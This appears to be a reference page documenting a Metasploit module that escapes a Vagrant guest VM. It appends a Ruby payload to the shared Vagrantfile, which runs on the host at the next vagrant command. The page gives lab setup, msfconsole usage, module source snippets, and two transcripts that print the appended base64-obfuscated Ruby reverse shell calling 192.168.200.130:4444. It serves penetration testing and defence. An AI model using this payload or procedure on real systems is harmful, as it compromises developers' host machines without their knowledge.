Vagrant Synced Folder Vagrantfile Breakout - Metasploit
This page contains detailed information about how to use the exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Vagrant Synced Folder Vagrantfile Breakout
Module: exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
Source code: modules/exploits/multi/local/vagrant_synced_folder_vagrantfile_breakout.rb
Disclosure date: 2011-01-19
Last modification time: 2022-10-26 17:33:44 +0000
Supported architecture(s): x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r
Supported platform(s): Ruby
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module exploits a default Vagrant synced folder (shared folder) to append a Ruby payload to the Vagrant project Vagrantfile config file. By default, unless a Vagrant project explicitly disables shared folders, Vagrant mounts the project directory on the host as a writable 'vagrant' directory on the guest virtual machine. This directory includes the project Vagrantfile configuration file. Ruby code within the Vagrantfile is loaded and executed when a user runs any vagrant command from the project directory on the host, leading to execution of Ruby code on the host.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- config-changes: Module modifies some configuration setting on the target machine.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
msf exploit(vagrant_synced_folder_vagrantfile_breakout) > show targets
... a list of targets ...
msf exploit(vagrant_synced_folder_vagrantfile_breakout) > set TARGET target-id
msf exploit(vagrant_synced_folder_vagrantfile_breakout) > show options
... show and set options ...
msf exploit(vagrant_synced_folder_vagrantfile_breakout) > set SESSION session-id
msf exploit(vagrant_synced_folder_vagrantfile_breakout) > exploit
Required Options
- SESSION: The session to run this module on
Knowledge Base
Vulnerable Application
This module exploits a default Vagrant synced folder (shared folder) to append a Ruby payload to the Vagrant project Vagrantfile config file.
By default, unless a Vagrant project explicitly disables shared folders, Vagrant mounts the project directory on the host as a writable 'vagrant' directory on the guest virtual machine. This directory includes the project Vagrantfile configuration file.
Ruby code within the Vagrantfile is loaded and executed when a user runs any vagrant command from the project directory on the host, leading to execution of Ruby code on the host.
Installation
Install a virtualization provider. Vagrant uses VirtualBox by default.
Download and install Vagrant:
- https://www.vagrantup.com/downloads
Follow the Getting Started tutorial to create a simple Vagrant project with guest virtual machine:
- https://learn.hashicorp.com/tutorials/vagrant/getting-started-project-setup?in=vagrant/getting-started
Note that this will require approximately 3GB of free disk space.
Example using hashicorp/bionic64
box:
$ mkdir vagrant_getting_started
$ cd vagrant_getting_started/
$ vagrant init hashicorp/bionic64
A `Vagrantfile` has been placed in this directory. You are now
ready to `vagrant up` your first virtual environment! Please read
the comments in the Vagrantfile as well as documentation on
`vagrantup.com` for more information on using Vagrant.
$ vagrant up
Bringing machine 'default' up with 'virtualbox' provider...
==> default: Box 'hashicorp/bionic64' could not be found. Attempting to find and install...
default: Box Provider: virtualbox
default: Box Version: >= 0
==> default: Loading metadata for box 'hashicorp/bionic64'
default: URL: https://vagrantcloud.com/hashicorp/bionic64
==> default: Adding box 'hashicorp/bionic64' (v1.0.282) for provider: virtualbox
default: Downloading: https://vagrantcloud.com/hashicorp/boxes/bionic64/versions/1.0.282/providers/virtualbox.box
==> default: Successfully added box 'hashicorp/bionic64' (v1.0.282) for 'virtualbox'!
==> default: Importing base box 'hashicorp/bionic64'...
==> default: Matching MAC address for NAT networking...
==> default: Checking if box 'hashicorp/bionic64' version '1.0.282' is up to date...
==> default: Setting the name of the VM: vagrant_getting_started_default_1664845773160_64119
==> default: Clearing any previously set network interfaces...
==> default: Preparing network interfaces based on configuration...
default: Adapter 1: nat
==> default: Forwarding ports...
default: 22 (guest) => 2222 (host) (adapter 1)
==> default: Booting VM...
==> default: Waiting for machine to boot. This may take a few minutes...
default: SSH address: 127.0.0.1:2222
default: SSH username: vagrant
default: SSH auth method: private key
default: Warning: Connection reset. Retrying...
default:
default: Vagrant insecure key detected. Vagrant will automatically replace
default: this with a newly generated keypair for better security.
default:
default: Inserting generated public key within guest...
default: Removing insecure key from the guest if it's present...
default: Key inserted! Disconnecting and reconnecting using new SSH key...
==> default: Machine booted and ready!
==> default: Checking for guest additions in VM...
default: The guest additions on this VM do not match the installed version of
default: VirtualBox! In most cases this is fine, but in rare cases it can
default: prevent things such as shared folders from working properly. If you see
default: shared folder errors, please make sure the guest additions within the
default: virtual machine match the version of VirtualBox you have installed on
default: your host and reload your VM.
default:
default: Guest Additions Version: 6.0.10
default: VirtualBox Version: 6.1
==> default: Mounting shared folders...
default: /vagrant => /home/user/vagrant/vagrant_getting_started
Note: As the virtual machine resides within a virtual NAT environment,
for testing purposes it may be easier to bridge the virtual machine network
adapter to allow access from the LAN. This can be achieved by modifying
the virtual machine network adapter settings via the virtualbox
GUI.
Also note that in doing so you are opening an intentionally vulnerable guest VM to your network for the purposes of executing arbitrary code on the host.
Verification Steps
- Start
msfconsole
- Get a session within a Vagrant guest virtual machine
- Do:
use exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
- Do:
set SESSION <session>
- Do:
check
- The module should report that the host appears to be vulnerable
- Do:
set PAYLOAD ruby/shell_reverse_tcp
- Do:
set lhost <lhost>
- Do:
set lport <lport>
- Do:
run
- The module should report that the payload was written successfully
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD ruby/shell_reverse_tcp
- Do:
set lhost <lhost>
- Do:
set lport <lport>
- Do:
run -jz
- Wait until a user runs a vagrant command from within the project directory on the host system (ie,
vagrant status
) - You should get a new session on the host operating system
Options
VAGRANTFILE_PATH
Path to Vagrantfile
(leave blank to auto detect).
Scenarios
hashicorp/bionic64 guest virtual machine in Vagrant 2.3.1 with VirtualBox 6.1 running on Ubuntu 22.04.1
msf6 > sessions -i 1 -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (::1)
Computer : vagrant.vm
OS : Ubuntu 18.04 (Linux 4.15.0-58-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
msf6 > sessions -i 1 -C getuid
[*] Running 'getuid' on meterpreter session 1 (::1)
Server username: vagrant
msf6 > use exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
[*] Using configured payload ruby/shell_reverse_tcp
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set session 1
session => 1
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set lport 4444
lport => 4444
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > check
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] The service is running, but could not be validated. Could not verify if C:\vagrant\Vagrantfile is writable.
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not verify if C:\vagrant\Vagrantfile is writable.
[*] Appending payload (516 bytes) to C:\vagrant\Vagrantfile ...
[*] Payload appended to C:\vagrant\Vagrantfile
[*] The payload will be executed when a user runs any vagrant command from within the project directory on the host system.
[!] This module requires manual removal of the payload from the project Vagrantfile: C:\vagrant\Vagrantfile
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > use exploit/multi/handler
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(multi/handler) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run -jz
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.200.130:4444
msf6 exploit(multi/handler) > [*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.204:44242) at 2022-10-16 05:46:32 -0400
msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt)
pwd
/home/user/vagrant/vagrant_getting_started
tail -n 13 Vagrantfile
code = %(cmVxdWlyZSAnc29ja2V0JztjPVRDUFNvY2tldC5uZXcoIjE5Mi4xNjguMjAwLjEzMCIsIDQ0NDQpOyRzdGRpbi5yZW9wZW4oYyk7JHN0ZG91dC5yZW9wZW4oYyk7JHN0ZGVyci5yZW9wZW4oYyk7JHN0ZGluLmVhY2hfbGluZXt8bHxsPWwuc3RyaXA7bmV4dCBpZiBsLmxlbmd0aD09MDsoSU8ucG9wZW4obCwicmIiKXt8ZmR8IGZkLmVhY2hfbGluZSB7fG98IGMucHV0cyhvLnN0cmlwKSB9fSkgcmVzY3VlIG5pbCB9).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen(%(ruby), %(wb)) rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end
StefanScherer/windows_2019 guest virtual machine in Vagrant 2.3.1 with VirtualBox 6.1 running on Ubuntu 22.04.1
msf6 > sessions -i 1 -C sysinfo
[*] Running 'sysinfo' on meterpreter session 1 (10.0.2.15)
Computer : VAGRANT
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
msf6 > sessions -i 1 -C getuid
[*] Running 'getuid' on meterpreter session 1 (10.0.2.15)
Server username: VAGRANT\test
msf6 > use exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
[*] Using configured payload ruby/shell_reverse_tcp
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set session 1
session => 1
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > check
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] The service is running, but could not be validated. Could not verify if /vagrant/Vagrantfile is writable.
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > set lport 4444
lport => 4444
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > run
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: windows
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not verify if /vagrant/Vagrantfile is writable.
[*] Appending payload (516 bytes) to /vagrant/Vagrantfile ...
[*] Payload appended to /vagrant/Vagrantfile
[*] The payload will be executed when a user runs any vagrant command from within the project directory on the host system.
[!] This module requires manual removal of the payload from the project Vagrantfile: /vagrant/Vagrantfile
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > use exploit/multi/handler
[*] Using configured payload windows/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(multi/handler) > run -jz
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.200.130:4444
msf6 exploit(multi/handler) > [*] Command shell session 2 opened (192.168.200.130:4444 -> 192.168.200.204:51524) at 2022-10-16 06:34:04 -0400
msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),138(libvirt)
pwd
/home/user/vagrant/windows2019
tail -n 13 Vagrantfile
code = %(cmVxdWlyZSAnc29ja2V0JztjPVRDUFNvY2tldC5uZXcoIjE5Mi4xNjguMjAwLjEzMCIsIDQ0NDQpOyRzdGRpbi5yZW9wZW4oYyk7JHN0ZG91dC5yZW9wZW4oYyk7JHN0ZGVyci5yZW9wZW4oYyk7JHN0ZGluLmVhY2hfbGluZXt8bHxsPWwuc3RyaXA7bmV4dCBpZiBsLmxlbmd0aD09MDsoSU8ucG9wZW4obCwicmIiKXt8ZmR8IGZkLmVhY2hfbGluZSB7fG98IGMucHV0cyhvLnN0cmlwKSB9fSkgcmVzY3VlIG5pbCB9).unpack(%(m0)).first
if RUBY_PLATFORM =~ /mswin|mingw|win32/
inp = IO.popen(%(ruby), %(wb)) rescue nil
if inp
inp.write(code)
inp.close
end
else
if ! Process.fork()
eval(code) rescue nil
end
end
Go back to menu.
Msfconsole Usage
Here is how the multi/local/vagrant_synced_folder_vagrantfile_breakout exploit module looks in the msfconsole:
msf6 > use exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
[*] Using configured payload ruby/shell_reverse_tcp
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > show info
Name: Vagrant Synced Folder Vagrantfile Breakout
Module: exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout
Platform: Ruby
Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-01-19
Provided by:
HashiCorp
bcoles <[email protected]>
Module side effects:
artifacts-on-disk
ioc-in-logs
config-changes
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Ruby Code
1 Unix Command
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
VAGRANTFILE_PATH no Path to Vagrantfile (leave blank to auto detect)
Payload information:
Description:
This module exploits a default Vagrant synced folder (shared folder)
to append a Ruby payload to the Vagrant project Vagrantfile config
file. By default, unless a Vagrant project explicitly disables
shared folders, Vagrant mounts the project directory on the host as
a writable 'vagrant' directory on the guest virtual machine. This
directory includes the project Vagrantfile configuration file. Ruby
code within the Vagrantfile is loaded and executed when a user runs
any vagrant command from the project directory on the host, leading
to execution of Ruby code on the host.
References:
https://www.vagrantup.com/docs/synced-folders
https://www.virtualbox.org/manual/ch04.html#sharedfolders
Module Options
This is a complete list of options available in the multi/local/vagrant_synced_folder_vagrantfile_breakout exploit:
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > show options
Module options (exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
VAGRANTFILE_PATH no Path to Vagrantfile (leave blank to auto detect)
Payload options (ruby/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
**DisablePayloadHandler: True (no handler will be created!)**
Exploit target:
Id Name
-- ----
0 Ruby Code
Advanced Options
Here is a complete list of advanced options supported by the multi/local/vagrant_synced_folder_vagrantfile_breakout exploit:
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > show advanced
Module advanced options (exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler true no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ForceExploit false no Override check result
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Payload advanced options (ruby/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
CreateSession true no Create a new session for every successful login
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependFork true no Start the payload in its own process via fork or popen
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/local/vagrant_synced_folder_vagrantfile_breakout module can exploit:
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > show targets
Exploit targets:
Id Name
-- ----
0 Ruby Code
1 Unix Command
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/local/vagrant_synced_folder_vagrantfile_breakout exploit:
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
5 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
6 payload/ruby/pingback_bind_tcp normal No Ruby Pingback, Bind TCP
7 payload/ruby/pingback_reverse_tcp normal No Ruby Pingback, Reverse TCP
8 payload/ruby/shell_bind_tcp normal No Ruby Command Shell, Bind TCP
9 payload/ruby/shell_bind_tcp_ipv6 normal No Ruby Command Shell, Bind TCP IPv6
10 payload/ruby/shell_reverse_tcp normal No Ruby Command Shell, Reverse TCP
11 payload/ruby/shell_reverse_tcp_ssl normal No Ruby Command Shell, Reverse TCP SSL
Evasion Options
Here is the full list of possible evasion options supported by the multi/local/vagrant_synced_folder_vagrantfile_breakout exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/local/vagrant_synced_folder_vagrantfile_breakout) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Vagrantfile not found.
- <VAGRANTFILE> is not writable.
- Could not verify if <VAGRANTFILE> is writable.
- <VAGRANTFILE> is writable!
- Could not find Vagrantfile
- No target selected
- Could not write to <VAGRANTFILE>
- This module requires manual removal of the payload from the project Vagrantfile: <VAGRANTFILE>
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Vagrantfile not found.
Here is a relevant code snippet related to the "Vagrantfile not found." error message:
115: def vagrantfile
116: @vagrantfile ||= find_vagrantfile_path
117: end
118:
119: def check
120: return CheckCode::Safe('Vagrantfile not found.') unless vagrantfile
121:
122: # `writable?' method does not support Windows systems
123: begin
124: return CheckCode::Detected("#{vagrantfile} is not writable.") unless writable?(vagrantfile)
125: rescue RuntimeError
<VAGRANTFILE> is not writable.
Here is a relevant code snippet related to the "<VAGRANTFILE> is not writable." error message:
119: def check
120: return CheckCode::Safe('Vagrantfile not found.') unless vagrantfile
121:
122: # `writable?' method does not support Windows systems
123: begin
124: return CheckCode::Detected("#{vagrantfile} is not writable.") unless writable?(vagrantfile)
125: rescue RuntimeError
126: return CheckCode::Detected("Could not verify if #{vagrantfile} is writable.")
127: end
128:
129: CheckCode::Appears("#{vagrantfile} is writable!")
Could not verify if <VAGRANTFILE> is writable.
Here is a relevant code snippet related to the "Could not verify if <VAGRANTFILE> is writable." error message:
121:
122: # `writable?' method does not support Windows systems
123: begin
124: return CheckCode::Detected("#{vagrantfile} is not writable.") unless writable?(vagrantfile)
125: rescue RuntimeError
126: return CheckCode::Detected("Could not verify if #{vagrantfile} is writable.")
127: end
128:
129: CheckCode::Appears("#{vagrantfile} is writable!")
130: end
131:
<VAGRANTFILE> is writable!
Here is a relevant code snippet related to the "<VAGRANTFILE> is writable!" error message:
124: return CheckCode::Detected("#{vagrantfile} is not writable.") unless writable?(vagrantfile)
125: rescue RuntimeError
126: return CheckCode::Detected("Could not verify if #{vagrantfile} is writable.")
127: end
128:
129: CheckCode::Appears("#{vagrantfile} is writable!")
130: end
131:
132: def exploit
133: fail_with(Failure::NotVulnerable, 'Could not find Vagrantfile') unless vagrantfile
134:
Could not find Vagrantfile
Here is a relevant code snippet related to the "Could not find Vagrantfile" error message:
128:
129: CheckCode::Appears("#{vagrantfile} is writable!")
130: end
131:
132: def exploit
133: fail_with(Failure::NotVulnerable, 'Could not find Vagrantfile') unless vagrantfile
134:
135: case target['Type']
136: when :ruby
137: data = payload.encoded
138: when :unix_cmd
No target selected
Here is a relevant code snippet related to the "No target selected" error message:
136: when :ruby
137: data = payload.encoded
138: when :unix_cmd
139: data = "`#{payload.encoded}`"
140: else
141: fail_with(Failure::NoTarget, 'No target selected')
142: end
143:
144: print_status("Appending payload (#{data.length} bytes) to #{vagrantfile} ...")
145:
146: unless append_file(vagrantfile, "\n#{data}\n")
Could not write to <VAGRANTFILE>
Here is a relevant code snippet related to the "Could not write to <VAGRANTFILE>" error message:
142: end
143:
144: print_status("Appending payload (#{data.length} bytes) to #{vagrantfile} ...")
145:
146: unless append_file(vagrantfile, "\n#{data}\n")
147: fail_with(Failure::Unknown, "Could not write to #{vagrantfile}")
148: end
149:
150: print_status("Payload appended to #{vagrantfile}")
151: print_status('The payload will be executed when a user runs any vagrant command from within the project directory on the host system.')
152: print_warning("This module requires manual removal of the payload from the project Vagrantfile: #{vagrantfile}")
This module requires manual removal of the payload from the project Vagrantfile: <VAGRANTFILE>
Here is a relevant code snippet related to the "This module requires manual removal of the payload from the project Vagrantfile: <VAGRANTFILE>" error message:
144: print_status("Appending payload (#{data.length} bytes) to #{vagrantfile} ...")
145:
146: unless append_file(vagrantfile, "\n#{data}\n")
147: fail_with(Failure::Unknown, "Could not write to #{vagrantfile}")
148: end
149:
150: print_status("Payload appended to #{vagrantfile}")
151: print_status('The payload will be executed when a user runs any vagrant command from within the project directory on the host system.')
152: print_warning("This module requires manual removal of the payload from the project Vagrantfile: #{vagrantfile}")
153: end
154: end
Go back to menu.
Related Pull Requests
- #17225 Merged Pull Request: Update YARD documentation to use proper @return instead of @returns
- #17219 Merged Pull Request: Fix broken zabbix_login scanner regex for new versions
- #17220 Merged Pull Request: Fix pe inject payload crash
- #17196 Merged Pull Request: Msf::Post::Windows: Add Msf::Post::Windows::System mixin
- #17192 Merged Pull Request: Password Manager Pro password recovery post module
- #17213 Merged Pull Request: Update identify hash library and call
- #17207 Merged Pull Request: Add msfvenom / msfconsole support for Rust shellcode
- #17190 Merged Pull Request: Fix the Netapi32 bufptr data type
- #17174 Merged Pull Request: FLIR AX8 thermal camera unauthenticated RCE [CVE-2022-37061]
- #17142 Merged Pull Request: Apache CouchDB Erlang RCE module CVE-2022-24706
- #17168 Merged Pull Request: Add module for Webmin auth File Manager RCE (CVE-2022-0824)
References
- CVE: Not available
- https://www.vagrantup.com/docs/synced-folders
- https://www.virtualbox.org/manual/ch04.html#sharedfolders
See Also
Check also the following modules related to this module:
- exploit/multi/local/allwinner_backdoor
- exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc
- exploit/multi/local/xorg_x11_suid_server
- exploit/multi/local/xorg_x11_suid_server_modulepath
- exploit/multi/http/log1cms_ajax_create_folder
- exploit/linux/pop3/cyrus_pop3d_popsubfolders
- exploit/windows/browser/creative_software_cachefolder
- exploit/windows/browser/hp_loadrunner_addfolder
- exploit/windows/http/sysax_create_folder
- exploit/windows/misc/hp_dataprotector_new_folder
- auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass
Authors
- HashiCorp
- bcoles
Version
This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.